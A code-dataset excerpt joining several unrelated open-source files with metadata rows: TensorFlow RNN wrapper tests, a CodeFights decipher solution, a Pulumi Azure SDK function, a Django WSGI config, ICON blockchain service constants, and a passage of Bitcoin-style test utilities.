self.evaluate([variables_lib.global_variables_initializer()])
res = self.evaluate([g, g_res, m_new, m_new_res])
# Residual connections
self.assertAllClose(res[1], res[0] + [1., 1., 1.])
# States are left untouched
self.assertAllClose(res[2], res[3])
def testResidualWrapperWithSlice(self):
wrapper_type = rnn_cell_wrapper_v2.ResidualWrapper
x = ops.convert_to_tensor_v2(
np.array([[1., 1., 1., 1., 1.]]), dtype="float32")
m = ops.convert_to_tensor_v2(np.array([[0.1, 0.1, 0.1]]), dtype="float32")
base_cell = rnn_cell_impl.GRUCell(
3, kernel_initializer=init_ops.constant_initializer(0.5),
bias_initializer=init_ops.constant_initializer(0.5))
g, m_new = base_cell(x, m)
def residual_with_slice_fn(inp, out):
inp_sliced = array_ops.slice(inp, [0, 0], [-1, 3])
return inp_sliced + out
g_res, m_new_res = wrapper_type(
base_cell, residual_with_slice_fn)(x, m)
self.evaluate([variables_lib.global_variables_initializer()])
res_g, res_g_res, res_m_new, res_m_new_res = self.evaluate(
[g, g_res, m_new, m_new_res])
# Residual connections
self.assertAllClose(res_g_res, res_g + [1., 1., 1.])
# States are left untouched
self.assertAllClose(res_m_new, res_m_new_res)
def testDeviceWrapper(self):
wrapper_type = rnn_cell_wrapper_v2.DeviceWrapper
x = array_ops.zeros([1, 3])
m = array_ops.zeros([1, 3])
cell = rnn_cell_impl.GRUCell(3)
wrapped_cell = wrapper_type(cell, "/cpu:0")
(name, dep), = wrapped_cell._checkpoint_dependencies
wrapped_cell.get_config() # Should not throw an error
self.assertIs(dep, cell)
self.assertEqual("cell", name)
outputs, _ = wrapped_cell(x, m)
self.assertIn("cpu:0", outputs.device.lower())
@parameterized.parameters(
[[rnn_cell_impl.DropoutWrapper, rnn_cell_wrapper_v2.DropoutWrapper],
[rnn_cell_impl.ResidualWrapper, rnn_cell_wrapper_v2.ResidualWrapper]])
def testWrapperKerasStyle(self, wrapper, wrapper_v2):
"""Tests if wrapper cell is instantiated in keras style scope."""
wrapped_cell_v2 = wrapper_v2(rnn_cell_impl.BasicRNNCell(1))
self.assertIsNone(getattr(wrapped_cell_v2, "_keras_style", None))
wrapped_cell = wrapper(rnn_cell_impl.BasicRNNCell(1))
self.assertFalse(wrapped_cell._keras_style)
@parameterized.parameters(
[rnn_cell_wrapper_v2.DropoutWrapper, rnn_cell_wrapper_v2.ResidualWrapper])
def testWrapperWeights(self, wrapper):
"""Tests that wrapper weights contain wrapped cells weights."""
base_cell = layers.SimpleRNNCell(1, name="basic_rnn_cell")
rnn_cell = wrapper(base_cell)
rnn_layer = layers.RNN(rnn_cell)
inputs = ops.convert_to_tensor_v2([[[1]]], dtype=dtypes.float32)
rnn_layer(inputs)
wrapper_name = generic_utils.to_snake_case(wrapper.__name__)
expected_weights = ["rnn/" + wrapper_name + "/" + var for var in
("kernel:0", "recurrent_kernel:0", "bias:0")]
self.assertLen(rnn_cell.weights, 3)
self.assertCountEqual([v.name for v in rnn_cell.weights], expected_weights)
self.assertCountEqual([v.name for v in rnn_cell.trainable_variables],
expected_weights)
self.assertCountEqual([v.name for v in rnn_cell.non_trainable_variables],
[])
self.assertCountEqual([v.name for v in rnn_cell.cell.weights],
expected_weights)
@parameterized.parameters(
[rnn_cell_wrapper_v2.DropoutWrapper, rnn_cell_wrapper_v2.ResidualWrapper])
def testWrapperV2Caller(self, wrapper):
"""Tests that wrapper V2 is using the LayerRNNCell's caller."""
with base_layer.keras_style_scope():
base_cell = rnn_cell_impl.MultiRNNCell(
[rnn_cell_impl.BasicRNNCell(1) for _ in range(2)])
rnn_cell = wrapper(base_cell)
inputs = ops.convert_to_tensor_v2([[1]], dtype=dtypes.float32)
state = ops.convert_to_tensor_v2([[1]], dtype=dtypes.float32)
_ = rnn_cell(inputs, [state, state])
weights = base_cell._cells[0].weights
self.assertLen(weights, expected_len=2)
self.assertTrue(all("_wrapper" in v.name for v in weights))
@parameterized.parameters(
[rnn_cell_wrapper_v2.DropoutWrapper, rnn_cell_wrapper_v2.ResidualWrapper])
def testWrapperV2Build(self, wrapper):
cell = rnn_cell_impl.LSTMCell(10)
wrapper = wrapper(cell)
wrapper.build((1,))
self.assertTrue(cell.built)
def testDeviceWrapperSerialization(self):
wrapper_cls = rnn_cell_wrapper_v2.DeviceWrapper
cell = layers.LSTMCell(10)
wrapper = wrapper_cls(cell, "/cpu:0")
config = wrapper.get_config()
reconstructed_wrapper = wrapper_cls.from_config(config)
self.assertDictEqual(config, reconstructed_wrapper.get_config())
self.assertIsInstance(reconstructed_wrapper, wrapper_cls)
def testResidualWrapperSerialization(self):
wrapper_cls = rnn_cell_wrapper_v2.ResidualWrapper
cell = layers.LSTMCell(10)
wrapper = wrapper_cls(cell)
config = wrapper.get_config()
reconstructed_wrapper = wrapper_cls.from_config(config)
self.assertDictEqual(config, reconstructed_wrapper.get_config())
self.assertIsInstance(reconstructed_wrapper, wrapper_cls)
wrapper = wrapper_cls(cell, residual_fn=lambda i, o: i + i + o)
config = wrapper.get_config()
reconstructed_wrapper = wrapper_cls.from_config(config)
# Assert the reconstructed function will perform the math correctly.
self.assertEqual(reconstructed_wrapper._residual_fn(1, 2), 4)
def residual_fn(inputs, outputs):
return inputs * 3 + outputs
wrapper = wrapper_cls(cell, residual_fn=residual_fn)
config = wrapper.get_config()
reconstructed_wrapper = wrapper_cls.from_config(config)
# Assert the reconstructed function will perform the math correctly.
self.assertEqual(reconstructed_wrapper._residual_fn(1, 2), 5)
def testDropoutWrapperSerialization(self):
wrapper_cls = rnn_cell_wrapper_v2.DropoutWrapper
cell = layers.GRUCell(10)
wrapper = wrapper_cls(cell)
config = wrapper.get_config()
reconstructed_wrapper = wrapper_cls.from_config(config)
self.assertDictEqual(config, reconstructed_wrapper.get_config())
self.assertIsInstance(reconstructed_wrapper, wrapper_cls)
wrapper = wrapper_cls(cell, dropout_state_filter_visitor=lambda s: True)
config = wrapper.get_config()
reconstructed_wrapper = wrapper_cls.from_config(config)
self.assertTrue(reconstructed_wrapper._dropout_state_filter(None))
def dropout_state_filter_visitor(unused_state):
return False
wrapper = wrapper_cls(
cell, dropout_state_filter_visitor=dropout_state_filter_visitor)
config = wrapper.get_config()
reconstructed_wrapper = wrapper_cls.from_config(config)
self.assertFalse(reconstructed_wrapper._dropout_state_filter(None))
def testDropoutWrapperWithKerasLSTMCell(self):
wrapper_cls = rnn_cell_wrapper_v2.DropoutWrapper
cell = layers.LSTMCell(10)
with self.assertRaisesRegexp(ValueError, "does not work with "):
wrapper_cls(cell)
cell = layers.LSTMCellV2(10)
with self.assertRaisesRegexp(ValueError, "does not work with "):
wrapper_cls(cell)
if __name__ == "__main__":
test.main()
| 41.025532
| 80
| 0.733326
|
6471e53a2b50a578cc0a32c5b9064b6a6b64a893
| 1,080
|
py
|
Python
|
arcade/python/arcade-theCore/10_LabOfTransformations/086_Decipher.py
|
netor27/codefights-arcade-solutions
|
69701ab06d45902c79ec9221137f90b75969d8c8
|
[
"MIT"
] | null | null | null |
arcade/python/arcade-theCore/10_LabOfTransformations/086_Decipher.py
|
netor27/codefights-arcade-solutions
|
69701ab06d45902c79ec9221137f90b75969d8c8
|
[
"MIT"
] | null | null | null |
arcade/python/arcade-theCore/10_LabOfTransformations/086_Decipher.py
|
netor27/codefights-arcade-solutions
|
69701ab06d45902c79ec9221137f90b75969d8c8
|
[
"MIT"
] | null | null | null |
'''
Consider the following ciphering algorithm:
For each character replace it with its code.
Concatenate all of the obtained numbers.
Given a ciphered string, return the initial one if it is known that it consists only of lowercase letters.
Note: here the character's code means its decimal ASCII code, the numerical representation of a character used by most modern programming languages.
Example
For cipher = "10197115121", the output should be
decipher(cipher) = "easy".
Explanation: charCode('e') = 101, charCode('a') = 97, charCode('s') = 115 and charCode('y') = 121.
'''
def decipher(cipher):
start = 0
end = 0
    result = []
    for i in range(len(cipher)):
        temp = castToValidLetter(cipher, start, end)
        if temp != '':
            result.append(temp)
            start = i + 1
            end = i + 1
        else:
            end += 1
return ''.join(result)
def castToValidLetter(cipher, start, end):
temp = int(cipher[start:end+1])
if ord('a') <= temp <= ord('z'):
return chr(temp)
else:
return ''
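# Minimal usage sketch (not part of the original kata solution): it re-checks
# the worked example from the problem statement above.
def _demo_decipher():
    assert decipher("10197115121") == "easy"
    assert castToValidLetter("97", 0, 1) == 'a'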
| 28.421053
| 148
| 0.628704
|
be70b1f0e1ec5cae9c1b572b3552bb694d71c95a
| 2,282
|
py
|
Python
|
sdk/python/pulumi_azure_nextgen/labservices/v20181015/get_global_user_operation_status.py
|
test-wiz-sec/pulumi-azure-nextgen
|
20a695af0d020b34b0f1c336e1b69702755174cc
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_nextgen/labservices/v20181015/get_global_user_operation_status.py
|
test-wiz-sec/pulumi-azure-nextgen
|
20a695af0d020b34b0f1c336e1b69702755174cc
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_nextgen/labservices/v20181015/get_global_user_operation_status.py
|
test-wiz-sec/pulumi-azure-nextgen
|
20a695af0d020b34b0f1c336e1b69702755174cc
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
__all__ = [
'GetGlobalUserOperationStatusResult',
'AwaitableGetGlobalUserOperationStatusResult',
'get_global_user_operation_status',
]
@pulumi.output_type
class GetGlobalUserOperationStatusResult:
"""
Status Details of the long running operation for an environment
"""
def __init__(__self__, status=None):
if status and not isinstance(status, str):
raise TypeError("Expected argument 'status' to be a str")
pulumi.set(__self__, "status", status)
@property
@pulumi.getter
def status(self) -> str:
"""
status of the long running operation for an environment
"""
return pulumi.get(self, "status")
class AwaitableGetGlobalUserOperationStatusResult(GetGlobalUserOperationStatusResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetGlobalUserOperationStatusResult(
status=self.status)
def get_global_user_operation_status(operation_url: Optional[str] = None,
user_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetGlobalUserOperationStatusResult:
"""
Use this data source to access information about an existing resource.
:param str operation_url: The operation url of long running operation
:param str user_name: The name of the user.
"""
__args__ = dict()
__args__['operationUrl'] = operation_url
__args__['userName'] = user_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-nextgen:labservices/v20181015:getGlobalUserOperationStatus', __args__, opts=opts, typ=GetGlobalUserOperationStatusResult).value
return AwaitableGetGlobalUserOperationStatusResult(
status=__ret__.status)
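# Illustrative usage sketch (the operation URL and user name below are
# placeholders, not real resource identifiers):
#
#   status_result = get_global_user_operation_status(
#       operation_url="<operation-url>",
#       user_name="<user-name>")
#   pulumi.export("operationStatus", status_result.status)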
| 35.107692
| 170
| 0.695004
|
06f57cbad9d521a407114aeb45de9d0195f21523
| 211
|
py
|
Python
|
espressodb/documentation/apps.py
|
remram44/espressodb
|
5aad7222ab81c0f1694b51171e5d197dbcc8a65f
|
[
"BSD-3-Clause"
] | 8
|
2019-12-10T04:30:01.000Z
|
2020-10-30T09:40:22.000Z
|
espressodb/documentation/apps.py
|
remram44/espressodb
|
5aad7222ab81c0f1694b51171e5d197dbcc8a65f
|
[
"BSD-3-Clause"
] | 41
|
2019-10-23T00:26:25.000Z
|
2021-10-21T07:55:57.000Z
|
espressodb/documentation/apps.py
|
remram44/espressodb
|
5aad7222ab81c0f1694b51171e5d197dbcc8a65f
|
[
"BSD-3-Clause"
] | 3
|
2020-01-09T21:29:09.000Z
|
2021-03-14T22:20:52.000Z
|
# pylint: disable=missing-docstring
from django.apps import AppConfig
class DocumentationConfig(AppConfig):
name = "espressodb.documentation"
verbose_name = "Documentation"
label = "documentation"
| 23.444444
| 37
| 0.763033
|
a6cab50749025eeeca9f5abce049d5a55b7793c9
| 12,317
|
py
|
Python
|
iconservice/icon_constant.py
|
icon-project/icon-service
|
dfa61fcc42425390a0398ada42ce2121278eec08
|
[
"Apache-2.0"
] | 52
|
2018-08-24T02:28:43.000Z
|
2021-07-06T04:44:22.000Z
|
iconservice/icon_constant.py
|
icon-project/icon-service
|
dfa61fcc42425390a0398ada42ce2121278eec08
|
[
"Apache-2.0"
] | 62
|
2018-09-17T06:59:16.000Z
|
2021-12-15T06:02:51.000Z
|
iconservice/icon_constant.py
|
icon-project/icon-service
|
dfa61fcc42425390a0398ada42ce2121278eec08
|
[
"Apache-2.0"
] | 35
|
2018-09-14T02:42:10.000Z
|
2022-02-05T10:34:46.000Z
|
# Copyright 2018 ICON Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from enum import IntFlag, unique, IntEnum, Enum, auto, Flag
SYSTEM_ADDRESS = "cx0000000000000000000000000000000000000000"
GOVERNANCE_ADDRESS = "cx0000000000000000000000000000000000000001"
ICON_DEPLOY_LOG_TAG = "DEPLOY"
ICON_LOADER_LOG_TAG = "LOADER"
ICX_LOG_TAG = "ICX"
ICON_DB_LOG_TAG = "DB"
IISS_LOG_TAG = "IISS"
STEP_LOG_TAG = "STEP"
WAL_LOG_TAG = "WAL"
ROLLBACK_LOG_TAG = "ROLLBACK"
BACKUP_LOG_TAG = "BACKUP"
JSONRPC_VERSION = '2.0'
CHARSET_ENCODING = 'utf-8'
ICX_IN_LOOP = 10 ** 18
# 32bytes == 256bit
DEFAULT_BYTE_SIZE = 32
DATA_BYTE_ORDER = 'big' # big endian
# Fixed fee is 0.01 icx.
FIXED_FEE = 10 ** 16
# Max data field size
MAX_DATA_SIZE = 512 * 1024
# Max external call count(1 is default SCORE call, 1024 is external call in the SCORE)
MAX_EXTERNAL_CALL_COUNT = 1 + 1024
# Max call stack size
MAX_CALL_STACK_SIZE = 64
ICON_DEX_DB_NAME = 'icon_dex'
PACKAGE_JSON_FILE = 'package.json'
ICX_TRANSFER_EVENT_LOG = 'ICXTransfer(Address,Address,int)'
ICON_SCORE_QUEUE_NAME_FORMAT = "IconScore.{channel_name}.{amqp_key}"
ICON_SERVICE_PROCTITLE_FORMAT = "icon_service." \
"{scoreRootPath}." \
"{stateDbRootPath}." \
"{channel}.{amqpKey}." \
"{amqpTarget}"
BUILTIN_SCORE_ADDRESS_MAPPER = {
'governance': GOVERNANCE_ADDRESS,
'system': SYSTEM_ADDRESS
}
BUILTIN_SCORE_IMPORT_WHITE_LIST = {"iconservice.iconscore.system": "['*']"}
ZERO_TX_HASH = bytes(DEFAULT_BYTE_SIZE)
class IssueDataKey:
PREP = "prep"
IREP = "irep"
RREP = "rrep"
EEP = "eep"
IEEP = "ieep"
REEP = "reep"
DAPP = "dapp"
IDAPP = "idapp"
RDAPP = "rdapp"
ISSUE_RESULT = "result"
COVERED_BY_FEE = "coveredByFee"
COVERED_BY_OVER_ISSUED_ICX = "coveredByOverIssuedICX"
ISSUE = "issue"
TOTAL_DELEGATION = "totalDelegation"
VALUE = "value"
TOTAL = "total"
ISSUE_EVENT_LOG_MAPPER = {
IssueDataKey.PREP: {
"event_signature": "PRepIssued(int,int,int,int)",
"data": [IssueDataKey.IREP, IssueDataKey.RREP, IssueDataKey.TOTAL_DELEGATION,
IssueDataKey.VALUE]
},
IssueDataKey.TOTAL: {
"event_signature": "ICXIssued(int,int,int,int)",
"data": []
}
}
ISSUE_CALCULATE_ORDER = [IssueDataKey.PREP]
BASE_TRANSACTION_INDEX = 0
class Revision(Enum):
GENESIS = 0
TWO = 2
THREE = 3
FOUR = 4
IISS = 5
DECENTRALIZATION = 6
FIX_TOTAL_ELECTED_PREP_DELEGATED = 7
# Revision 8
REALTIME_P2P_ENDPOINT_UPDATE = 8
OPTIMIZE_DIRTY_PREP_UPDATE = 8
# Revision 9
FIX_EMAIL_VALIDATION = 9
DIVIDE_NODE_ADDRESS = 9
FIX_BURN_EVENT_SIGNATURE = 9
ADD_LOGS_BLOOM_ON_BASE_TX = 9
SCORE_FUNC_PARAMS_CHECK = 9
SYSTEM_SCORE_ENABLED = 9
CHANGE_MAX_DELEGATIONS_TO_100 = 9
PREVENT_DUPLICATED_ENDPOINT = 9
SET_IREP_VIA_NETWORK_PROPOSAL = 9
MULTIPLE_UNSTAKE = 9
FIX_COIN_PART_BYTES_ENCODING = 9
STRICT_SCORE_DECORATOR_CHECK = 9
FIX_UNSTAKE_BUG = 10
LOCK_ADDRESS = 10
FIX_BALANCE_BUG = 11
BURN_V2_ENABLED = 12
IMPROVED_PRE_VALIDATOR = 12
VERIFY_ASSET_INTEGRITY = 12
USE_RLP = 12
# All revisions after Revision12 pass is_shutdown flag to loopchain
SHUTDOWN = 13
LATEST = 13
RC_DB_VERSION_0 = 0
RC_DB_VERSION_2 = 2
# The case that version is updated but not revision, set the version to the current revision
# The case that both version and revision is updated, add revision field to the version table
# The case that only revision is changed, do not update this table
RC_DATA_VERSION_TABLE = {
Revision.IISS.value: RC_DB_VERSION_0,
Revision.DECENTRALIZATION.value: RC_DB_VERSION_2
}
IISS_DB = 'iiss'
RC_SOCKET = 'iiss.sock'
META_DB = 'meta'
class ConfigKey:
BUILTIN_SCORE_OWNER = 'builtinScoreOwner'
SERVICE = 'service'
SERVICE_FEE = 'fee'
SERVICE_AUDIT = 'audit'
SERVICE_SCORE_PACKAGE_VALIDATOR = 'scorePackageValidator'
SCORE_ROOT_PATH = 'scoreRootPath'
STATE_DB_ROOT_PATH = 'stateDbRootPath'
CHANNEL = 'channel'
AMQP_KEY = 'amqpKey'
AMQP_TARGET = 'amqpTarget'
CONFIG = 'config'
TBEARS_MODE = 'tbearsMode'
IISS_CALCULATE_PERIOD = "iissCalculatePeriod"
TERM_PERIOD = 'termPeriod'
INITIAL_IREP = 'initialIRep'
PREP_MAIN_PREPS = 'mainPRepCount'
PREP_MAIN_AND_SUB_PREPS = 'mainAndSubPRepCount'
IPC_TIMEOUT = 'ipcTimeout'
DOS_GUARD = "dosGuard"
RESET_TIME = "resetTIme"
THRESHOLD = "threshold"
BAN_TIME = "banTime"
# log
LOG = 'log'
LOGGER = "logger"
LOG_FILE_PATH = 'filePath'
LOG_LEVEL = "level"
LOG_OUTPUT_TYPE = "outputType"
LOG_ROTATE = "rotate"
LOG_ROTATE_TYPE = "type"
LOG_ROTATE_PERIOD = "period"
LOG_ROTATE_INTERVAL = "interval"
LOG_ROTATE_AT_TIME = "atTime"
LOG_ROTATE_MAX_BYTES = "maxBytes"
LOG_ROTATE_BACKUP_COUNT = "backupCount"
STEP_TRACE_FLAG = 'stepTraceFlag'
PRECOMMIT_DATA_LOG_FLAG = 'precommitDataLogFlag'
# Reward calculator
# executable path
ICON_RC_DIR_PATH = 'iconRcPath'
# Boolean which determines Opening RC monitor channel (Default True)
ICON_RC_MONITOR = 'iconRcMonitor'
# IISS meta data
IISS_META_DATA = "iissMetaData"
REWARD_POINT = 'rewardPoint'
REWARD_MIN = "rewardMin"
REWARD_MAX = "rewardMAX"
UN_STAKE_LOCK_MIN = "lockMin"
UN_STAKE_LOCK_MAX = "lockMax"
PREP_REGISTRATION_FEE = "prepRegistrationFee"
DECENTRALIZE_TRIGGER = "decentralizeTrigger"
PENALTY_GRACE_PERIOD = "penaltyGracePeriod"
LOW_PRODUCTIVITY_PENALTY_THRESHOLD = "lowProductivityPenaltyThreshold"
BLOCK_VALIDATION_PENALTY_THRESHOLD = "blockValidationPenaltyThreshold"
# The maximum number of backup files for rollback
BACKUP_FILES = "backupFiles"
# Block invoke timeout in second
BLOCK_INVOKE_TIMEOUT = "blockInvokeTimeout"
UNSTAKE_SLOT_MAX = "unstakeSlotMax"
# The list of items(address, unstake, unstake_block_height)
# containing invalid expired unstakes to remove
INVALID_EXPIRED_UNSTAKES_PATH = "invalidExpiredUnstakesPath"
class EnableThreadFlag(IntFlag):
INVOKE = 1
QUERY = 2
VALIDATE = 4
class IconServiceFlag(IntFlag):
FEE = 1
AUDIT = 2
# DEPLOYER_WHITE_LIST = 4
SCORE_PACKAGE_VALIDATOR = 8
class IconNetworkValueType(Enum):
SERVICE_CONFIG = b'service_config'
STEP_PRICE = b'step_price'
STEP_COSTS = b'step_costs'
MAX_STEP_LIMITS = b'max_step_limits'
REVISION_CODE = b'revision_code'
REVISION_NAME = b'revision_name'
SCORE_BLACK_LIST = b'score_black_list'
IMPORT_WHITE_LIST = b'import_white_list'
IREP = b'irep'
@classmethod
def gs_migration_type_list(cls) -> list:
return [
cls.SERVICE_CONFIG,
cls.STEP_PRICE,
cls.STEP_COSTS,
cls.MAX_STEP_LIMITS,
cls.REVISION_CODE,
cls.REVISION_NAME,
cls.SCORE_BLACK_LIST,
cls.IMPORT_WHITE_LIST,
]
@classmethod
def gs_migration_count(cls) -> int:
return len(cls.gs_migration_type_list())
@unique
class IconScoreContextType(IntEnum):
# Write data to db directly
DIRECT = 0
# Record data to cache and after confirming the block, write them to db
INVOKE = 1
# Record data to cache for estimation of steps, discard cache after estimation.
ESTIMATION = 2
# Not possible to write data to db
QUERY = 3
@unique
class IconScoreFuncType(IntEnum):
# ReadOnly function
READONLY = 0
# Writable function
WRITABLE = 1
ENABLE_THREAD_FLAG = EnableThreadFlag.INVOKE | EnableThreadFlag.QUERY | EnableThreadFlag.VALIDATE
class DeployType(IntEnum):
INSTALL = 0
UPDATE = 1
class DeployState(IntEnum):
INACTIVE = 0
ACTIVE = 1
# 0xb9eeb235f715b166cf4b91ffcf8cc48a81913896086d30104ffc0cf47eed1cbd
INVALID_CLAIM_TX = [
b'\xb9\xee\xb25\xf7\x15\xb1f\xcfK\x91\xff\xcf\x8c\xc4\x8a\x81\x918\x96\x08m0\x10O\xfc\x0c\xf4~\xed\x1c\xbd'
]
HASH_TYPE_TABLE = [
"blockHash",
"txHash",
"prevBlockHash",
"rootHash"
]
PREP_MAIN_PREPS = 22
PREP_MAIN_AND_SUB_PREPS = 100
PREP_REGISTRATION_FEE = 2_000 * ICX_IN_LOOP
IISS_MAX_REWARD_RATE = 10_000
IISS_MIN_IREP = 10_000 * ICX_IN_LOOP
IISS_MAX_IREP_PERCENTAGE = 14
IISS_INITIAL_IREP = 50_000 * ICX_IN_LOOP
# 24 hours * 60 minutes * 60 seconds / 2 - 80 <- for PRep terms
TERM_PERIOD = 24 * 60 * 60 // 2 - 80
# 24 hours * 60 minutes * 60 seconds / 2
IISS_DAY_BLOCK = 24 * 60 * 60 // 2
IISS_MONTH_BLOCK = IISS_DAY_BLOCK * 30
IISS_MONTH = 12
IISS_ANNUAL_BLOCK = IISS_MONTH_BLOCK * IISS_MONTH
UNSTAKE_SLOT_MAX = 1_000
PERCENTAGE_FOR_BETA_2 = 100
ISCORE_EXCHANGE_RATE = 1_000
PENALTY_GRACE_PERIOD = IISS_DAY_BLOCK * 2
LOW_PRODUCTIVITY_PENALTY_THRESHOLD = 85 # Unit: Percent
BLOCK_VALIDATION_PENALTY_THRESHOLD = 660 # Unit: Blocks
BASE_TRANSACTION_VERSION = 3
PREP_PENALTY_SIGNATURE = "PenaltyImposed(Address,int,int)"
BACKUP_FILES = 10
BLOCK_INVOKE_TIMEOUT_S = 15
class RCStatus(IntEnum):
NOT_READY = 0
READY = 1
class RCCalculateResult(IntEnum):
SUCCESS = 0
FAIL = 1
IN_PROGRESS = 2
INVALID_BLOCK_HEIGHT = 3
class PRepStatus(Enum):
ACTIVE = 0
UNREGISTERED = auto()
DISQUALIFIED = auto()
class PenaltyReason(Enum):
NONE = 0
# disqualified
PREP_DISQUALIFICATION = auto()
LOW_PRODUCTIVITY = auto()
# suspended
BLOCK_VALIDATION = auto()
class PRepGrade(Enum):
MAIN = 0
SUB = 1
CANDIDATE = 2
class PRepResultState(Enum):
NORMAL = 0
IN_TERM_UPDATED = 1
class BlockVoteStatus(Enum):
NONE = 0
TRUE = 1
FALSE = 2
class PRepFlag(Flag):
"""Setting flags to True means that PRep fields specified by the flags has been changed
"""
NONE = 0
STATUS = auto()
NAME = auto()
COUNTRY = auto()
CITY = auto()
EMAIL = auto()
WEBSITE = auto()
DETAILS = auto()
P2P_ENDPOINT = auto()
PENALTY = auto()
GRADE = auto()
STAKE = auto()
DELEGATED = auto()
LAST_GENERATE_BLOCK_HEIGHT = auto()
TOTAL_BLOCKS = auto()
VALIDATED_BLOCKS = auto()
UNVALIDATED_SEQUENCE_BLOCKS = auto()
IREP = auto() # irep, irep_block_height
IREP_BLOCK_HEIGHT = auto()
NODE_ADDRESS = auto()
BLOCK_STATISTICS = TOTAL_BLOCKS | VALIDATED_BLOCKS | UNVALIDATED_SEQUENCE_BLOCKS
ALL = 0xFFFFFFFF
class PRepContainerFlag(Flag):
NONE = 0
DIRTY = auto()
class TermFlag(Flag):
NONE = 0
MAIN_PREPS = auto()
SUB_PREPS = auto()
MAIN_PREP_P2P_ENDPOINT = auto()
MAIN_PREP_NODE_ADDRESS = auto()
ALL = 0xFFFFFFFF
class RevisionChangedFlag(Flag):
# Empty
NONE = 0x0
# Set when STEP price changed on the block
# STEP_PRICE_CHANGED = 0x10
# Set when STEP costs changed on the block
# STEP_COST_CHANGED = 0x20
# Set when Max STEP limits changed on the block
# STEP_MAX_LIMIT_CHANGED = 0x40
# STEP changed flag mask
# STEP_ALL_CHANGED = 0xf0
# CHANGE REVISION
GENESIS_IISS_CALC = 0x100
IISS_CALC = 0x200
DECENTRALIZATION = 0x400
class RPCMethod:
ICX_GET_BALANCE = 'icx_getBalance'
ICX_GET_TOTAL_SUPPLY = 'icx_getTotalSupply'
ICX_GET_SCORE_API = 'icx_getScoreApi'
ISE_GET_STATUS = 'ise_getStatus'
ICX_CALL = 'icx_call'
ICX_SEND_TRANSACTION = 'icx_sendTransaction'
DEBUG_ESTIMATE_STEP = "debug_estimateStep"
DEBUG_GET_ACCOUNT = "debug_getAccount"
class DataType:
CALL = "call"
DEPLOY = "deploy"
DEPOSIT = "deposit"
MESSAGE = "message"
NONE = None
_TYPES = {CALL, DEPLOY, DEPOSIT, MESSAGE, NONE}
@classmethod
def contains(cls, value: str) -> bool:
return value in cls._TYPES
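# Illustrative sketch: contains() also accepts None, i.e. a transaction with no
# data field counts as a valid data type here.
#
#   assert DataType.contains("call") and DataType.contains(None)
#   assert not DataType.contains("unknown")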
| 24.535857
| 111
| 0.695299
|
6b25f358325145e39c6f0f273bf2c88adb22d53c
| 397
|
py
|
Python
|
djangoproj/djangoproj/wsgi.py
|
olson996/django_heroku
|
0ac764a00ab7069c8f59456502e67fbe1f6d8755
|
[
"MIT"
] | null | null | null |
djangoproj/djangoproj/wsgi.py
|
olson996/django_heroku
|
0ac764a00ab7069c8f59456502e67fbe1f6d8755
|
[
"MIT"
] | null | null | null |
djangoproj/djangoproj/wsgi.py
|
olson996/django_heroku
|
0ac764a00ab7069c8f59456502e67fbe1f6d8755
|
[
"MIT"
] | null | null | null |
"""
WSGI config for djangoproj project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'djangoproj.settings')
application = get_wsgi_application()
| 23.352941
| 78
| 0.788413
|
a33bf048176dba62199cbc57a5baf585c9f0f6e1
| 22,050
|
py
|
Python
|
test/functional/test_framework/util.py
|
aentan/ain
|
1d6db33159de1c8c7930d29a0ab0902f42b728c1
|
[
"MIT"
] | null | null | null |
test/functional/test_framework/util.py
|
aentan/ain
|
1d6db33159de1c8c7930d29a0ab0902f42b728c1
|
[
"MIT"
] | null | null | null |
test/functional/test_framework/util.py
|
aentan/ain
|
1d6db33159de1c8c7930d29a0ab0902f42b728c1
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2014-2019 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Helpful routines for regression testing."""
from base64 import b64encode
from binascii import unhexlify
from decimal import Decimal, ROUND_DOWN
import inspect
import json
import logging
import os
import random
import re
from subprocess import CalledProcessError
import time
from . import coverage
from .authproxy import AuthServiceProxy, JSONRPCException
from io import BytesIO
logger = logging.getLogger("TestFramework.utils")
# Assert functions
##################
def assert_fee_amount(fee, tx_size, fee_per_kB):
"""Assert the fee was in range"""
target_fee = round(tx_size * fee_per_kB / 1000, 8)
if fee < target_fee:
raise AssertionError("Fee of %s BTC too low! (Should be %s BTC)" % (str(fee), str(target_fee)))
# allow the wallet's estimation to be at most 2 bytes off
if fee > (tx_size + 2) * fee_per_kB / 1000:
raise AssertionError("Fee of %s BTC too high! (Should be %s BTC)" % (str(fee), str(target_fee)))
def assert_equal(thing1, thing2, *args):
if thing1 != thing2 or any(thing1 != arg for arg in args):
raise AssertionError("not(%s)" % " == ".join(str(arg) for arg in (thing1, thing2) + args))
def assert_greater_than(thing1, thing2):
if thing1 <= thing2:
raise AssertionError("%s <= %s" % (str(thing1), str(thing2)))
def assert_greater_than_or_equal(thing1, thing2):
if thing1 < thing2:
raise AssertionError("%s < %s" % (str(thing1), str(thing2)))
def assert_raises(exc, fun, *args, **kwds):
assert_raises_message(exc, None, fun, *args, **kwds)
def assert_raises_message(exc, message, fun, *args, **kwds):
try:
fun(*args, **kwds)
except JSONRPCException:
raise AssertionError("Use assert_raises_rpc_error() to test RPC failures")
except exc as e:
if message is not None and message not in e.error['message']:
